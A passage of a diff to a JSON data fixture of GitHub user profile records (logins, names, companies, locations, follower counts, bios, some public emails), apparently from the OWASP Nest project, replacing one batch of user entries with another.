"https://avatars.githubusercontent.com/u/1443744?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 2, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-02-10T15:10:31Z", - "updated_at": "2024-01-10T23:13:14Z", - "node_id": "U_kgDOB3QUig", + "public_repositories_count": 1, + "created_at": "2012-02-16T16:12:35Z", + "updated_at": "2022-09-11T15:08:54Z", + "node_id": "MDQ6VXNlcjE0NDM3NDQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381428,24 +638002,24 @@ }, { "model": "github.user", - "pk": 848, + "pk": 6084, "fields": { - "nest_created_at": "2024-09-11T22:12:44.842Z", - "nest_updated_at": "2024-09-11T22:12:44.842Z", - "name": "", - "login": "xuantien177", + "nest_created_at": "2024-09-22T06:44:26.438Z", + "nest_updated_at": "2024-09-22T20:26:35.846Z", + "name": "Berkeley Churchill", + "login": "bchurchill", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42117477?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/640745?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 0, + "following_count": 2, + "followers_count": 49, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2018-08-05T15:20:20Z", - "updated_at": "2024-08-16T03:59:26Z", - "node_id": "MDQ6VXNlcjQyMTE3NDc3", + "public_repositories_count": 20, + "created_at": "2011-02-27T12:26:51Z", + "updated_at": "2024-08-22T14:09:53Z", + "node_id": "MDQ6VXNlcjY0MDc0NQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381453,24 +638027,24 @@ }, { "model": "github.user", - "pk": 849, + "pk": 6085, "fields": { - "nest_created_at": "2024-09-11T22:12:45.678Z", - "nest_updated_at": "2024-09-11T22:12:45.678Z", + "nest_created_at": "2024-09-22T06:44:26.772Z", + "nest_updated_at": "2024-09-22T20:26:36.168Z", "name": "", - "login": "upamapsb", + "login": "AnthonyYalcin2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87877143?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/14276126?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2021-07-23T19:31:24Z", - "updated_at": "2024-09-06T12:25:15Z", - "node_id": "MDQ6VXNlcjg3ODc3MTQz", + "public_repositories_count": 1, + "created_at": "2015-09-14T13:48:35Z", + "updated_at": "2016-02-28T10:02:14Z", + "node_id": "MDQ6VXNlcjE0Mjc2MTI2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381478,24 +638052,49 @@ }, { "model": "github.user", - "pk": 850, + "pk": 6086, "fields": { - "nest_created_at": "2024-09-11T22:12:55.459Z", - "nest_updated_at": "2024-09-11T22:13:47.664Z", - "name": "Chetan Karande", - "login": "ckarande", + "nest_created_at": "2024-09-22T06:44:27.085Z", + "nest_updated_at": "2024-09-22T20:26:36.488Z", + "name": "Ally Weir", + "login": "allyjweir", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/264859?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3640069?v=4", + "company": "@github", + "location": "Glasgow, Scotland", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 19, + "public_gists_count": 20, + "public_repositories_count": 102, + "created_at": "2013-02-19T19:11:44Z", + "updated_at": "2024-08-30T10:28:51Z", + "node_id": "MDQ6VXNlcjM2NDAwNjk=", + "bio": "Senior Software Engineer at GitHub :octocat: ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6087, + "fields": { + "nest_created_at": "2024-09-22T06:44:27.402Z", + "nest_updated_at": "2024-09-22T20:26:36.805Z", + "name": "Alex Haynes", + "login": "Deseao", + "email": "alexhaynes93@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3657200?v=4", "company": "", - "location": "NY", + "location": "Chicago", "collaborators_count": 0, - "following_count": 2, - "followers_count": 144, - "public_gists_count": 1, - "public_repositories_count": 55, - "created_at": "2010-05-04T19:50:09Z", - "updated_at": "2024-04-10T11:07:47Z", - "node_id": "MDQ6VXNlcjI2NDg1OQ==", + "following_count": 29, + "followers_count": 11, + "public_gists_count": 0, + "public_repositories_count": 37, + "created_at": "2013-02-21T08:14:05Z", + "updated_at": "2024-09-12T18:32:33Z", + "node_id": "MDQ6VXNlcjM2NTcyMDA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381503,124 +638102,149 @@ }, { "model": "github.user", - "pk": 851, + "pk": 6088, "fields": { - "nest_created_at": "2024-09-11T22:12:59.274Z", - "nest_updated_at": "2024-09-11T22:12:59.274Z", - "name": "minhaz", - "login": "mebjas", - "email": "minhazav@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3007365?v=4", - "company": "Google", - "location": "Singapore", + "nest_created_at": "2024-09-22T06:44:35.612Z", + "nest_updated_at": "2024-09-22T18:31:10.765Z", + "name": "Jesús Rubio", + "login": "jesusprubio", + "email": "jesusprubio@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2753855?v=4", + "company": "@trebellar ", + "location": "A Coruña", + "collaborators_count": 0, + "following_count": 386, + "followers_count": 311, + "public_gists_count": 13, + "public_repositories_count": 37, + "created_at": "2012-11-08T21:13:11Z", + "updated_at": "2024-09-20T17:45:07Z", + "node_id": "MDQ6VXNlcjI3NTM4NTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6089, + "fields": { + "nest_created_at": "2024-09-22T06:44:36.940Z", + "nest_updated_at": "2024-09-22T18:31:12.056Z", + "name": "Thomas Taschauer", + "login": "TomTasche", + "email": "tomtasche@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/128734?v=4", + "company": "@MiraclApp", + "location": "Austria", "collaborators_count": 0, - "following_count": 16, - "followers_count": 504, - "public_gists_count": 137, - "public_repositories_count": 158, - "created_at": "2012-12-10T12:05:32Z", - "updated_at": "2024-09-01T11:23:37Z", - "node_id": "MDQ6VXNlcjMwMDczNjU=", - "bio": "Senior Software Engineer @google - Computational photography on lowest hardwares", + "following_count": 55, + "followers_count": 97, + "public_gists_count": 51, + "public_repositories_count": 89, + "created_at": "2009-09-18T19:53:12Z", + "updated_at": "2024-09-04T03:31:50Z", + "node_id": "MDQ6VXNlcjEyODczNA==", + "bio": "", "is_hireable": true, - "twitter_username": "minhazav" + "twitter_username": "" } }, { "model": "github.user", - "pk": 852, + "pk": 6090, "fields": { - "nest_created_at": "2024-09-11T22:13:00.122Z", - "nest_updated_at": "2024-09-11T22:13:00.122Z", - "name": "Snyk Community", - "login": "snyk-community", - "email": "community@snyk.io", - "avatar_url": "https://avatars.githubusercontent.com/u/22027093?v=4", - "company": "@snyk", + "nest_created_at": "2024-09-22T06:44:37.251Z", + "nest_updated_at": "2024-09-22T18:31:12.366Z", + "name": "Justin Boyer", + "login": "jboyer2012", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1661404?v=4", + "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 16, + "followers_count": 20, "public_gists_count": 0, - "public_repositories_count": 108, - "created_at": "2016-09-06T11:38:19Z", - "updated_at": "2017-02-13T08:03:56Z", - "node_id": "MDQ6VXNlcjIyMDI3MDkz", - "bio": "Snyk's community, opens pull requests to fix known vulnerabilities in your dependencies. Check out https://snyk.io/ to learn more.", + "public_repositories_count": 17, + "created_at": "2012-04-20T02:03:36Z", + "updated_at": "2022-06-17T14:20:17Z", + "node_id": "MDQ6VXNlcjE2NjE0MDQ=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 853, + "pk": 6091, "fields": { - "nest_created_at": "2024-09-11T22:13:00.554Z", - "nest_updated_at": "2024-09-12T00:13:30.506Z", - "name": "Kim Carter", - "login": "binarymist", + "nest_created_at": "2024-09-22T06:44:37.879Z", + "nest_updated_at": "2024-09-22T18:31:13.024Z", + "name": "Joe Bowbeer", + "login": "joebowbeer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2862029?v=4", - "company": "binarymist", - "location": "Land of the Long White Cloud", + "avatar_url": "https://avatars.githubusercontent.com/u/28679?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 138, - "public_gists_count": 1, - "public_repositories_count": 73, - "created_at": "2012-11-22T10:20:44Z", - "updated_at": "2024-05-23T00:14:43Z", - "node_id": "MDQ6VXNlcjI4NjIwMjk=", - "bio": "Founder of BinaryMist, Creator of PurpleTeam-Labs, Author of Holistic Infosec for Web Developers, Host se-radio.net, Co-founder ChCon.nz\r\n,\r\n", - "is_hireable": true, - "twitter_username": "binarymist" + "following_count": 29, + "followers_count": 45, + "public_gists_count": 2, + "public_repositories_count": 233, + "created_at": "2008-10-13T01:57:42Z", + "updated_at": "2024-09-17T11:19:59Z", + "node_id": "MDQ6VXNlcjI4Njc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 854, + "pk": 6092, "fields": { - "nest_created_at": "2024-09-11T22:13:06.094Z", - "nest_updated_at": "2024-09-11T22:13:06.501Z", - "name": "Josep Servat", - "login": "servatj", - "email": "jservatlorca@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3521485?v=4", - "company": "Divance", - "location": "Dubai", + "nest_created_at": "2024-09-22T06:44:38.204Z", + "nest_updated_at": "2024-09-22T18:42:43.957Z", + "name": "", + "login": "iNoSec2", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51358868?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 235, - "followers_count": 67, - "public_gists_count": 10, - "public_repositories_count": 32, - "created_at": "2013-02-09T21:51:34Z", - "updated_at": "2024-09-07T08:49:56Z", - "node_id": "MDQ6VXNlcjM1MjE0ODU=", - "bio": "I'm an enthusiast developer of many technologies, currently working with node js, react, python and scala and having an eye to blockchain technologies.", + "following_count": 24, + "followers_count": 32, + "public_gists_count": 22, + "public_repositories_count": 742, + "created_at": "2019-06-04T07:43:19Z", + "updated_at": "2024-09-02T19:09:52Z", + "node_id": "MDQ6VXNlcjUxMzU4ODY4", + "bio": "This account is a bookmark repo.", "is_hireable": true, - "twitter_username": "servatj" + "twitter_username": "" } }, { "model": "github.user", - "pk": 855, + "pk": 6093, "fields": { - "nest_created_at": "2024-09-11T22:13:12.041Z", - "nest_updated_at": "2024-09-11T22:13:12.041Z", - "name": "xin jin", - "login": "lucas1004jx", - "email": "lucas1004jx@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/26882101?v=4", + "nest_created_at": "2024-09-22T06:44:38.528Z", + "nest_updated_at": "2024-09-22T18:31:13.668Z", + "name": "Jaap Karan Singh", + "login": "jksdua", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1538739?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 10, - "public_gists_count": 8, - "public_repositories_count": 23, - "created_at": "2017-04-03T19:46:04Z", - "updated_at": "2024-06-27T16:23:55Z", - "node_id": "MDQ6VXNlcjI2ODgyMTAx", + "following_count": 1, + "followers_count": 13, + "public_gists_count": 11, + "public_repositories_count": 83, + "created_at": "2012-03-15T01:57:04Z", + "updated_at": "2024-09-19T06:12:30Z", + "node_id": "MDQ6VXNlcjE1Mzg3Mzk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381628,124 +638252,224 @@ }, { "model": "github.user", - "pk": 856, + "pk": 6094, "fields": { - "nest_created_at": "2024-09-11T22:13:17.547Z", - "nest_updated_at": "2024-09-11T22:13:17.548Z", - "name": "Carlos Azaustre", - "login": "carlosazaustre", - "email": "cazaustre@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/650752?v=4", - "company": "@PintaAPIs", - "location": "Madrid, Spain", + "nest_created_at": "2024-09-22T06:44:39.172Z", + "nest_updated_at": "2024-09-22T18:31:14.328Z", + "name": "Oleksii Reshetnik", + "login": "oleksiireshetnik", + "email": "oleksii.reshetnik@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6969727?v=4", + "company": "CareerOS", + "location": "Berlin, Germany", "collaborators_count": 0, - "following_count": 250, - "followers_count": 4169, - "public_gists_count": 15, - "public_repositories_count": 283, - "created_at": "2011-03-04T10:48:06Z", - "updated_at": "2024-08-28T10:29:01Z", - "node_id": "MDQ6VXNlcjY1MDc1Mg==", - "bio": "Software Engineer ▪︎ Associate Professor UEM ▪︎ Google Developer Expert (GDE) in Web Technologies ▪︎ Microsoft MVP", + "following_count": 24, + "followers_count": 24, + "public_gists_count": 3, + "public_repositories_count": 30, + "created_at": "2014-03-16T23:16:54Z", + "updated_at": "2024-09-19T17:23:56Z", + "node_id": "MDQ6VXNlcjY5Njk3Mjc=", + "bio": "CTO, Co-founder @CareerOS ", "is_hireable": true, - "twitter_username": "carlosazaustre" + "twitter_username": "" } }, { "model": "github.user", - "pk": 857, + "pk": 6095, "fields": { - "nest_created_at": "2024-09-11T22:13:23.043Z", - "nest_updated_at": "2024-09-11T22:13:23.043Z", - "name": "Milecia McG", - "login": "flippedcoder", + "nest_created_at": "2024-09-22T06:44:39.484Z", + "nest_updated_at": "2024-09-22T18:31:14.657Z", + "name": "Thomas", + "login": "tehtbl", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/47196133?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/3999809?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 92, + "following_count": 117, + "followers_count": 32, "public_gists_count": 1, - "public_repositories_count": 36, - "created_at": "2019-01-30T22:31:52Z", - "updated_at": "2024-08-30T18:09:40Z", - "node_id": "MDQ6VXNlcjQ3MTk2MTMz", + "public_repositories_count": 43, + "created_at": "2013-03-28T20:22:24Z", + "updated_at": "2024-09-17T20:08:53Z", + "node_id": "MDQ6VXNlcjM5OTk4MDk=", "bio": "", "is_hireable": false, - "twitter_username": "FlippedCoding" + "twitter_username": "" } }, { "model": "github.user", - "pk": 858, + "pk": 6096, "fields": { - "nest_created_at": "2024-09-11T22:13:39.459Z", - "nest_updated_at": "2024-09-11T22:13:39.459Z", - "name": "Theba Gomez", - "login": "KoolTheba", + "nest_created_at": "2024-09-22T06:44:39.805Z", + "nest_updated_at": "2024-09-22T18:31:14.972Z", + "name": "robin.ahn(안성현)", + "login": "ahnteve", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26543236?v=4", - "company": "@OSWeekends @Fictizia @node-girls ", - "location": "Madrid", + "avatar_url": "https://avatars.githubusercontent.com/u/33370010?v=4", + "company": "@croquiscom", + "location": "Seoul, Korea", "collaborators_count": 0, - "following_count": 92, - "followers_count": 157, - "public_gists_count": 4, - "public_repositories_count": 83, - "created_at": "2017-03-20T11:49:28Z", - "updated_at": "2024-07-09T15:14:37Z", - "node_id": "MDQ6VXNlcjI2NTQzMjM2", - "bio": "Fullstack SWE 🌳 | \r\nGuilds Ambassador and Org. @OSWeekends | @nodegirls Madrid Founder & Lead | Open Source contributor & advocate", + "following_count": 11, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2017-11-04T10:03:39Z", + "updated_at": "2024-08-25T14:06:55Z", + "node_id": "MDQ6VXNlcjMzMzcwMDEw", + "bio": "", "is_hireable": false, - "twitter_username": "KoolTheba" + "twitter_username": "" } }, { "model": "github.user", - "pk": 859, + "pk": 6097, "fields": { - "nest_created_at": "2024-09-11T22:13:41.113Z", - "nest_updated_at": "2024-09-11T22:13:41.970Z", - "name": "Nicolas Harraudeau", - "login": "nharraud", + "nest_created_at": "2024-09-22T06:44:40.132Z", + "nest_updated_at": "2024-09-22T18:31:15.286Z", + "name": "Steve Chappell", + "login": "steverify", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5708796?v=4", - "company": "", - "location": "Geneva", + "avatar_url": "https://avatars.githubusercontent.com/u/13260481?v=4", + "company": "https://www.synopsys.com/software", + "location": "Silicon Valley, USA", "collaborators_count": 0, "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2015-07-09T18:56:53Z", + "updated_at": "2024-07-17T15:58:07Z", + "node_id": "MDQ6VXNlcjEzMjYwNDgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6098, + "fields": { + "nest_created_at": "2024-09-22T06:44:41.100Z", + "nest_updated_at": "2024-09-22T18:31:16.249Z", + "name": "Mike", + "login": "mhxbe", + "email": "mike.henderyckx@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4376446?v=4", + "company": "MHX Consulting", + "location": "Antwerp, Belgium", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 13, + "public_gists_count": 6, + "public_repositories_count": 34, + "created_at": "2013-05-08T12:08:54Z", + "updated_at": "2024-09-21T06:04:23Z", + "node_id": "MDQ6VXNlcjQzNzY0NDY=", + "bio": "I'm currently working as a Freelance \r\nJavaScript Developer. I'm focused on React & Accessibility. ⚡️", + "is_hireable": false, + "twitter_username": "mhxbe" + } +}, +{ + "model": "github.user", + "pk": 6099, + "fields": { + "nest_created_at": "2024-09-22T06:44:41.422Z", + "nest_updated_at": "2024-09-22T18:31:16.561Z", + "name": "Michael Ficarra", + "login": "michaelficarra", + "email": "github@michael.ficarra.me", + "avatar_url": "https://avatars.githubusercontent.com/u/218840?v=4", + "company": "@shapesecurity, part of @f5networks", + "location": "Colorado, USA", + "collaborators_count": 0, + "following_count": 156, + "followers_count": 1039, + "public_gists_count": 81, + "public_repositories_count": 183, + "created_at": "2010-03-09T05:08:47Z", + "updated_at": "2024-09-18T04:31:53Z", + "node_id": "MDQ6VXNlcjIxODg0MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "smooshMap" + } +}, +{ + "model": "github.user", + "pk": 6100, + "fields": { + "nest_created_at": "2024-09-22T06:44:42.060Z", + "nest_updated_at": "2024-09-22T18:31:17.187Z", + "name": "Kevin Alcock", + "login": "kevinnz", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/170748?v=4", + "company": "", + "location": "Christchurch, New Zealand", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 53, + "public_gists_count": 8, + "public_repositories_count": 28, + "created_at": "2009-12-22T00:58:58Z", + "updated_at": "2024-08-31T00:37:17Z", + "node_id": "MDQ6VXNlcjE3MDc0OA==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 6101, + "fields": { + "nest_created_at": "2024-09-22T06:44:42.402Z", + "nest_updated_at": "2024-09-22T18:31:17.501Z", + "name": "Ingo Bente", + "login": "ingben", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5255388?v=4", + "company": "", + "location": "Hamburg", + "collaborators_count": 0, + "following_count": 9, "followers_count": 15, "public_gists_count": 0, - "public_repositories_count": 87, - "created_at": "2013-10-17T11:05:26Z", - "updated_at": "2024-08-16T06:58:22Z", - "node_id": "MDQ6VXNlcjU3MDg3OTY=", - "bio": "Creating a new open source Team Building platform for developers.", + "public_repositories_count": 10, + "created_at": "2013-08-18T14:11:03Z", + "updated_at": "2024-09-06T20:47:48Z", + "node_id": "MDQ6VXNlcjUyNTUzODg=", + "bio": "CISO in Hamburg. Boardgame fanatic. Organizer of HHsecurity meetup and @elbsides security conference.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 860, + "pk": 6102, "fields": { - "nest_created_at": "2024-09-11T22:13:42.821Z", - "nest_updated_at": "2024-09-11T22:13:42.821Z", - "name": "", - "login": "mo718", + "nest_created_at": "2024-09-22T06:44:42.722Z", + "nest_updated_at": "2024-09-22T18:31:17.812Z", + "name": "Ilya Verbitskiy", + "login": "ilich", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64512529?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1131048?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 54, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2020-04-29T02:53:51Z", - "updated_at": "2024-02-28T02:58:51Z", - "node_id": "MDQ6VXNlcjY0NTEyNTI5", + "public_repositories_count": 80, + "created_at": "2011-10-16T07:03:57Z", + "updated_at": "2024-09-12T04:03:11Z", + "node_id": "MDQ6VXNlcjExMzEwNDg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381753,49 +638477,74 @@ }, { "model": "github.user", - "pk": 861, + "pk": 6103, "fields": { - "nest_created_at": "2024-09-11T22:14:09.542Z", - "nest_updated_at": "2024-09-13T16:53:14.651Z", - "name": "Sebastien Deleersnyder", - "login": "SebaDele", - "email": "seba@owasp.org", - "avatar_url": "https://avatars.githubusercontent.com/u/5277413?v=4", - "company": "Toreon", - "location": "Belgium", + "nest_created_at": "2024-09-22T06:44:43.355Z", + "nest_updated_at": "2024-09-22T19:39:06.980Z", + "name": "Cédric Fabianski", + "login": "cfabianski", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/110196?v=4", + "company": "@Bearer ", + "location": "Remote", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 49, + "public_gists_count": 7, + "public_repositories_count": 77, + "created_at": "2009-07-30T09:57:21Z", + "updated_at": "2024-08-27T08:21:00Z", + "node_id": "MDQ6VXNlcjExMDE5Ng==", + "bio": "", + "is_hireable": true, + "twitter_username": "cfabianski" + } +}, +{ + "model": "github.user", + "pk": 6104, + "fields": { + "nest_created_at": "2024-09-22T06:44:43.669Z", + "nest_updated_at": "2024-09-22T18:31:18.761Z", + "name": "Bob Evans", + "login": "bizob2828", + "email": "robert.evans25@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1874937?v=4", + "company": "New Relic", + "location": "Baltimore", "collaborators_count": 0, "following_count": 2, - "followers_count": 89, - "public_gists_count": 0, - "public_repositories_count": 16, - "created_at": "2013-08-21T10:17:52Z", - "updated_at": "2024-09-04T07:34:52Z", - "node_id": "MDQ6VXNlcjUyNzc0MTM=", + "followers_count": 25, + "public_gists_count": 10, + "public_repositories_count": 101, + "created_at": "2012-06-21T01:43:54Z", + "updated_at": "2024-09-17T03:06:21Z", + "node_id": "MDQ6VXNlcjE4NzQ5Mzc=", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "bizob2828" } }, { "model": "github.user", - "pk": 862, + "pk": 6105, "fields": { - "nest_created_at": "2024-09-11T22:14:14.881Z", - "nest_updated_at": "2024-09-11T22:14:35.778Z", - "name": "Jesse Burns", - "login": "jburns131", + "nest_created_at": "2024-09-22T06:44:50.215Z", + "nest_updated_at": "2024-09-22T19:39:16.669Z", + "name": "YRprey", + "login": "yrprey", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1120974?v=4", - "company": "jbWebWare.com", - "location": "MA, USA", + "avatar_url": "https://avatars.githubusercontent.com/u/161217681?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 11, - "followers_count": 20, - "public_gists_count": 12, - "public_repositories_count": 4, - "created_at": "2011-10-12T00:22:27Z", - "updated_at": "2022-01-10T06:51:28Z", - "node_id": "MDQ6VXNlcjExMjA5NzQ=", + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 23, + "created_at": "2024-02-25T12:59:29Z", + "updated_at": "2024-07-10T12:35:22Z", + "node_id": "U_kgDOCZv8kQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381803,124 +638552,124 @@ }, { "model": "github.user", - "pk": 863, + "pk": 6106, "fields": { - "nest_created_at": "2024-09-11T22:14:17.055Z", - "nest_updated_at": "2024-09-11T22:14:17.055Z", - "name": "AbiusX", - "login": "abiusx", - "email": "git@abiusx.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1401691?v=4", - "company": "Google / UVa / ZDResearch", - "location": "US", + "nest_created_at": "2024-09-22T06:44:52.230Z", + "nest_updated_at": "2024-09-22T19:39:18.600Z", + "name": "EBell", + "login": "ebell451", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3712453?v=4", + "company": "", + "location": "Houston, TX", "collaborators_count": 0, - "following_count": 23, - "followers_count": 87, - "public_gists_count": 19, - "public_repositories_count": 31, - "created_at": "2012-02-02T13:00:57Z", - "updated_at": "2024-05-09T07:36:51Z", - "node_id": "MDQ6VXNlcjE0MDE2OTE=", - "bio": "Professional Hacker / Entrepreneur", - "is_hireable": true, - "twitter_username": "abiusx" + "following_count": 6, + "followers_count": 7, + "public_gists_count": 5, + "public_repositories_count": 186, + "created_at": "2013-02-27T04:37:35Z", + "updated_at": "2024-07-15T22:31:50Z", + "node_id": "MDQ6VXNlcjM3MTI0NTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "ebell451" } }, { "model": "github.user", - "pk": 864, + "pk": 6107, "fields": { - "nest_created_at": "2024-09-11T22:14:18.313Z", - "nest_updated_at": "2024-09-11T22:14:20.426Z", - "name": "", - "login": "udf2457", + "nest_created_at": "2024-09-22T06:44:52.558Z", + "nest_updated_at": "2024-09-22T19:39:18.913Z", + "name": "Murat Alagoz", + "login": "mrtlgz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6958684?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/47647189?v=4", "company": "", - "location": "", + "location": "Mississauga, Ontario, Canada", "collaborators_count": 0, - "following_count": 0, + "following_count": 12, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2014-03-15T09:54:49Z", - "updated_at": "2024-09-05T18:35:02Z", - "node_id": "MDQ6VXNlcjY5NTg2ODQ=", - "bio": "", + "public_repositories_count": 7, + "created_at": "2019-02-14T22:52:13Z", + "updated_at": "2024-09-06T02:27:40Z", + "node_id": "MDQ6VXNlcjQ3NjQ3MTg5", + "bio": "I'm interested in almost all kinds of CyberSecurity-related subjects. Help people how to identify and mitigate the vulnerabilities in their systems. ", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 865, + "pk": 6108, "fields": { - "nest_created_at": "2024-09-11T22:14:22.091Z", - "nest_updated_at": "2024-09-11T22:14:22.091Z", - "name": "Gael Coat", - "login": "Gael42", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5319819?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T06:44:53.864Z", + "nest_updated_at": "2024-09-22T19:39:20.183Z", + "name": "Sadican Üstün", + "login": "sadicann", + "email": "sadican@hotmail.com.tr", + "avatar_url": "https://avatars.githubusercontent.com/u/16766128?v=4", + "company": "@cyrops ", + "location": "Zonguldak, Turkey", "collaborators_count": 0, - "following_count": 0, - "followers_count": 7, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2013-08-27T09:25:00Z", - "updated_at": "2024-07-01T13:54:00Z", - "node_id": "MDQ6VXNlcjUzMTk4MTk=", - "bio": "", + "following_count": 10, + "followers_count": 75, + "public_gists_count": 1, + "public_repositories_count": 19, + "created_at": "2016-01-18T20:54:14Z", + "updated_at": "2024-09-20T11:39:58Z", + "node_id": "MDQ6VXNlcjE2NzY2MTI4", + "bio": "CEH, Go, JavaScript", "is_hireable": false, - "twitter_username": "" + "twitter_username": "sadican" } }, { "model": "github.user", - "pk": 866, + "pk": 6109, "fields": { - "nest_created_at": "2024-09-11T22:14:25.604Z", - "nest_updated_at": "2024-09-11T22:14:25.604Z", - "name": "Aleksander ", - "login": "bblue", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6132918?v=4", + "nest_created_at": "2024-09-22T06:44:54.175Z", + "nest_updated_at": "2024-09-22T19:39:20.504Z", + "name": "Sam Sanoop", + "login": "snoopysecurity", + "email": "sams@snyk.io", + "avatar_url": "https://avatars.githubusercontent.com/u/12512020?v=4", "company": "", - "location": "Norway", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2013-12-08T01:18:36Z", - "updated_at": "2024-05-30T23:05:04Z", - "node_id": "MDQ6VXNlcjYxMzI5MTg=", - "bio": "", + "following_count": 40, + "followers_count": 446, + "public_gists_count": 18, + "public_repositories_count": 50, + "created_at": "2015-05-19T11:36:33Z", + "updated_at": "2024-07-08T09:29:30Z", + "node_id": "MDQ6VXNlcjEyNTEyMDIw", + "bio": "Sam S", "is_hireable": false, - "twitter_username": "" + "twitter_username": "snoopysecurity" } }, { "model": "github.user", - "pk": 867, + "pk": 6110, "fields": { - "nest_created_at": "2024-09-11T22:14:26.485Z", - "nest_updated_at": "2024-09-11T22:14:26.485Z", - "name": "", - "login": "kroder", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/6228443?v=4", + "nest_created_at": "2024-09-22T06:44:55.439Z", + "nest_updated_at": "2024-09-22T19:39:21.771Z", + "name": "David Howe", + "login": "dhower7", + "email": "david_howe@rapid7.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18124502?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2013-12-20T06:34:01Z", - "updated_at": "2024-01-31T10:50:52Z", - "node_id": "MDQ6VXNlcjYyMjg0NDM=", + "public_repositories_count": 8, + "created_at": "2016-03-28T19:01:52Z", + "updated_at": "2024-08-14T18:40:39Z", + "node_id": "MDQ6VXNlcjE4MTI0NTAy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -381928,24 +638677,24 @@ }, { "model": "github.user", - "pk": 868, + "pk": 6111, "fields": { - "nest_created_at": "2024-09-11T22:14:28.617Z", - "nest_updated_at": "2024-09-11T22:14:28.617Z", - 